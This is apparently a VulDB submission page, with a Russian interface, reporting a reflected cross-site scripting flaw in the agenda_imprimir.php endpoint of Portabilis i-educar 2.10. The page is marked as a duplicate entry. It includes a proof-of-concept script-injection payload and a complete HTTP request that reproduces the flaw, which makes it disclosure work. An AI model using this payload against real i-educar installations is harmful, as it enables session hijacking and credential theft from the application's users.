Отправить #649873: Portabilis i-educar 2.10 Cross Site Scripting (XSS) ReflectedИнформация

НазваниеPortabilis i-educar 2.10 Cross Site Scripting (XSS) Reflected
Описание# Cross-Site Scripting (XSS) Reflected endpoint `agenda_imprimir.php` in multiples parameters --- ## Summary A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the `agenda_imprimir.php` endpoint of the _i-educar_ application. This vulnerability allows attackers to inject malicious scripts into the `tipoacao, data_inicio and data_fim` parameters. The payload is reflected in the application’s HTTP response without proper sanitization, leading to immediate execution in the victim’s browser. --- ## Details **Vulnerable Endpoint:** `GET /agenda_imprimir.php` **Parameter:** `tipoacao, data_inicio and data_fim` The application fails to properly validate and sanitize user input in the `tipoacao` parameter. An attacker can craft a malicious URL containing a JavaScript payload, which is reflected back in the server’s response and executed when a victim accesses the crafted link. --- ## PoC **Payload:** `"><script>alert('XSS-PoC')</script>` ### Steps to Reproduce: 1. Log in to the _i-educar_ application. 2. Make a request using Caido similar to the one below. ``` POST /intranet/agenda_imprimir.php?cod_agenda=2 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br, zstd Content-Type: application/x-www-form-urlencoded Content-Length: 77 Origin: http://localhost Connection: keep-alive Referer: http://localhost/intranet/agenda_imprimir.php?cod_agenda=2 Cookie: [PUT NEW COOKIE] Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Priority: u=0, i tipoacao=Novo"><script>alert('XSS-PoC')</script>&data_inicio=02%2F02%2F2025&data_fim=03%2F02%2F2025&impressora=0 ``` <img width="840" height="585" alt="Pasted image 20250816234245" src="https://github.com/user-attachments/assets/d537a7f4-9d69-41a3-9cf3-46a5fb812a2c" /> The result: <img width="740" height="533" alt="Pasted image 20250816234414" src="https://github.com/user-attachments/assets/087c2fad-1b66-4bcf-bd30-af7db730b493" /> the same vulnerability occurs in parameters `data_inicio and data_fim`. --- ## Impact Reflected XSS vulnerabilities can lead to severe consequences, including: - **Session hijacking:** Theft of cookies or authentication tokens - **Credential theft:** Capturing sensitive user credentials via injected scripts - **Malware delivery:** Redirecting victims to malicious downloads or exploit pages - **Phishing attacks:** Displaying deceptive forms or content to steal user data - **Reputation damage:** Exploiting trust between the application and its users - **Client-side manipulation:** Altering the application’s content and behavior dynamically
Источник⚠️ https://github.com/marcelomulder/CVE/blob/main/i-educar/Cross-Site%20Scripting%20(XSS)%20Reflected%20endpoint%20%60agenda_imprimir.php%60%20in%20multiples%20parameters.md
Пользователь
 marceloQz (UID 87549)
Представление07.09.2025 16:35 (9 месяцы назад)
Модерация17.09.2025 09:01 (10 days later)
СтатусДубликат
Запись VulDB242143 [Portábilis i-Educar до 2.7.5 HTTP GET Request agenda_imprimir.php cod_agenda межсайтовый скриптинг]
Баллы0

ПредыдущийОбзорДалее

Interested in the pricing of exploits?

See the underground prices here!